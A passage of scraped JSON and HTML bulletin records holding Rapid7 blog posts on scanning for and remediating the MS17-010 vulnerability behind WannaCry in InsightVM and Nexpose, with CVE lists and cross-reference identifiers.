font-family: Arial; color: #3f98d4;\"><a class=\"jive-link-thread-small\" data-containerId=\"2004\" data-containerType=\"14\" data-objectId=\"9963\" data-objectType=\"1\" href=\"https://community.rapid7.com/thread/9963\">WannaCry - Scanning &amp; Reporting.</a></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Remediation Project</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">In InsightVM, you can also create a remediation project to track the progress of remediation. To do this, go to the &ldquo;Projects&#8221; tab and click &ldquo;Create a Project&#8221;:</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #231f20;\"><a href=\"https://lh5.googleusercontent.com/vT0bpOOFI8vB3q3V9gw8-6F5W9nDDjQSwCiYeai89avr0DFI0a7gbl0RLnuxHfrOJ7dA6U4zd1bV4zaEdA3WHeVD-F5C8E_Ok75WKrdvhHWqG3v-yzBxQVCIk6ZrcUCRgZ_jOHC9\"><img class=\"jive-image\" height=\"144\" src=\"https://lh5.googleusercontent.com/vT0bpOOFI8vB3q3V9gw8-6F5W9nDDjQSwCiYeai89avr0DFI0a7gbl0RLnuxHfrOJ7dA6U4zd1bV4zaEdA3WHeVD-F5C8E_Ok75WKrdvhHWqG3v-yzBxQVCIk6ZrcUCRgZ_jOHC9\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in <span style=\"font-family: 'courier new', courier;\">vulnerability.alternateIds.altId CONTAINS \"MS17-010\"</span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh5.googleusercontent.com/EKYc9oj7OfPlbI3V-CxqCdTrnBcrr3fyVQHq_vbi2ba2nN5g-lMp_vSoZGp9tDByRKlVgVuRKXn2-h1ZaJUiiRZHm2y4-JlBItYYUiKqIUuv8FwSuZy1tlF89xpX8lChUuJQPGKd\"><img class=\"jive-image\" height=\"248\" src=\"https://lh5.googleusercontent.com/EKYc9oj7OfPlbI3V-CxqCdTrnBcrr3fyVQHq_vbi2ba2nN5g-lMp_vSoZGp9tDByRKlVgVuRKXn2-h1ZaJUiiRZHm2y4-JlBItYYUiKqIUuv8FwSuZy1tlF89xpX8lChUuJQPGKd\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. If you have </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7839\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/08/simple-remediation-collaboration\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">JIRA or ServiceNow</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">, you can also configure the automatic ticketing integration between InsightVM and JIRA/ServiceNow to automatically assign tickets to the right folks.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you&#8217;ll be able to quickly scan for the vulnerabilities leveraged by this ransomworm. If you have any questions please don&#8217;t hesitate to let us know!</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on this ransomworm, </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">please visit this page</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></p></div><!-- [DocumentBodyEnd:736fb2f2-6580-4bdc-908e-ca4c7c801548] -->", "title": "Petya-like ransomworm: Leveraging InsightVM and Nexpose for visibility into MS17-010", "cvelist": ["CVE-2017-0101", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "_object_type": "robots.models.rss.RssBulletin", "viewCount": 130, "enchantments": {"score": {"value": 7.9, "vector": "NONE", "modified": "2017-06-28T03:17:01", "rev": 2}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0101", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96625", "SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2017-06-28T03:17:01", "rev": 2}}, "reporter": "Ken Mizota", "bulletinFamily": "blog", "objectVersion": "1.5", "type": "rapid7community", "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"published": "2017-05-16T17:51:28", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "enchantments": {"score": {"value": 7.6, "vector": "NONE", "modified": "2017-05-16T18:48:52", "rev": 2}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810814", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-017.NASL", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10984"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0101", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0102", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96625", "SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96627", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0102", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}], "modified": "2017-05-16T18:48:52", "rev": 2}}, "id": "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "objectVersion": "1.5", "title": "Scanning and Remediating WannaCry/MS17-010 in InsightVM and Nexpose", "bulletinFamily": "blog", "viewCount": 210, "reporter": "Nathan Palanov", "references": [], "enchantments_done": [], "type": "rapid7community", "_object_type": "robots.models.rss.RssBulletin", "history": [{"lastseen": "2017-05-16T14:48:48", "bulletin": {"published": "2017-05-16T14:27:53", "enchantments": {}, "id": "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "objectVersion": "1.4", "title": "Scanning and Remediating WannaCry/MS17-010 in InsightVM and Nexpose", "bulletinFamily": "blog", "viewCount": 11, "reporter": "Nathan Palanov", "references": [], "type": "rapid7community", "history": [], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "<!-- [DocumentBodyStart:1fb0e960-c2df-479c-860b-c11c12f4819b] --><div class=\"jive-rendered-content\"><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Today, security teams are starting their work week with a scramble to remediate MS17-010, in order to prevent the associated <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor\" target=\"_blank\">ransomware attack, WannaCry</a>, also known as Wanna Decryptor, WNCRY, and Wanna Decryptor 2.0 (how I miss the halcyon days when vulnerabilities had gentle names like Poodle). </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">With all of the WannaCry information circulating we want to keep this simple. First, check out this link to an <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7869\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/05/12/wanna-decryptor-wncry-ransomware-explained\">overview of the WannaCry ransomware vulnerability</a> written by <a class=\"jive-link-profile-small jiveTT-hover-user\" data-containerId=\"-1\" data-containerType=\"-1\" data-objectId=\"29826\" data-objectType=\"3\" href=\"https://community.rapid7.com/people/hrbrmstr\">Bob Rudis</a></span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">, and then review the below steps to quickly scan for this vulnerability in your own infrastructure (if you aren&#8217;t already a customer, go </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">try out InsightVM for free</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> you can use this free trial to scan for this vulnerability across your environment), create a dynamic asset group to continuously see affected assets, as well as create a dynamic remediation project to track the progress of remediating WannaCry.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Here is the InsightVM/Nexpose step-by-step guide to create a scan template specifically to look for MS17-010:</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">1. Under the Administration tab, go to Templates &gt; Manage Templates</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66939/pastedImage_11.png\"><img class=\"image-1 jive-image\" height=\"276\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66939/754-276/pastedImage_11.png\" style=\" width: 754.425px;\" width=\"754\"/></a></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">2. Copy the following template: Full Audit enhanced logging without Web Spider. Don&#8217;t forget to give your copy a name and description; here, we&#8217;ll call it &ldquo;WNCRY Scan Template&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66940/pastedImage_12.png\"><img class=\"image-2 jive-image\" height=\"299\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66940/758-299/pastedImage_12.png\" style=\"width:758px; height: 301.367px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66944/pastedImage_13.png\"><img class=\"image-3 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66944/758-275/pastedImage_13.png\" style=\" width: 798.319px;\" width=\"758\"/></a></span></span><span><span><br/></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">3. Click on Vulnerability Checks and then &ldquo;By Individual Check&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66945/pastedImage_14.png\"><img class=\"jive-image image-4\" height=\"322\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66945/758-322/pastedImage_14.png\" style=\" width: 867.529px;\" width=\"758\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">4. Add Check &ldquo;<a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" target=\"_blank\">MS17-010</a>&#8221; and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66946/pastedImage_15.png\"><img class=\"image-5 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66946/758-275/pastedImage_15.png\" style=\" width:758px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should come back with 192 checks that are related to MS17-010. The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" target=\"_blank\">CVE-2017-0143</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" target=\"_blank\">CVE-2017-0144</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" target=\"_blank\">CVE-2017-0145</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" target=\"_blank\">CVE-2017-0146</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" target=\"_blank\">CVE-2017-0147</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" target=\"_blank\">CVE-2017-0148</a></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">5. Now, under \"By Category\" click &ldquo;Remove Categories&#8221;, select all, and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66950/pastedImage_16.png\"><img class=\"image-6 jive-image\" height=\"202\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66950/758-202/pastedImage_16.png\" style=\" width: 973.212px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66952/pastedImage_18.png\"><img class=\"jive-image image-8\" height=\"161\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66952/758-161/pastedImage_18.png\" style=\" width: 1008.09px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">6. And finally, under Check Type, click &ldquo;Remove Check Types&#8221;, select all, and click save</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66953/pastedImage_20.png\"><img class=\"image-9 jive-image\" height=\"122\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66953/758-122/pastedImage_20.png\" style=\" width: 1060.2px;\" width=\"758\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">7. Save the template and run a scan to identify all assets with MS17-010.</span></h2><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2><span style=\"font-size: 18pt;\">Creating a Dynamic Asset Group for MS17-010</span></h2><p><span style=\"font-size: 12pt;\">Now that you have your assets scanned, you may want to create a Dynamic Asset Group to report/tag off of that will update itself whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\">InsightVM</a> console, just under the search button:<br/></span></p><p><span style=\"font-size: 12pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66963/pastedImage_34.png\"><img class=\"image-13 jive-image\" height=\"118\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66963/468-118/pastedImage_34.png\" style=\" width: 468.099px;\" width=\"468\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66971/pastedImage_1.png\"><img class=\"jive-image image-14\" height=\"513\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66971/758-513/pastedImage_1.png\" style=\" width: 804.524px;\" width=\"758\"/></a></span></p><p dir=\"ltr\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\">Creating a WannaCry Dashboard</h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">Recently, Ken Mizota posted an article on how to build a custom dashboard to </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #3f98d4;\">track your exposure to exploits from the Shadow Brokers leak</span></a><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">. If you already did that, you're good to go! If you wanted to be specific to WannaCry, you could use this Dashboard filter:</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0101\" OR asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\"</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">OR asset.vulnerability.title CONTAINS \"cve-2017-0102\"</span></p><p style=\"min-height: 8pt; padding: 0px;\"><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\"> </span>&#160;</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Creating a Remediation Project for MS17-010:</h2><p>In InsightVM, you can also create a remediation project for MS17-010 to track the progress of remediation live. To do this, go to the &ldquo;Projects&#8221; tab and click &ldquo;Create a Project&#8221;:</p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66955/pastedImage_28.png\"><img class=\"image-11 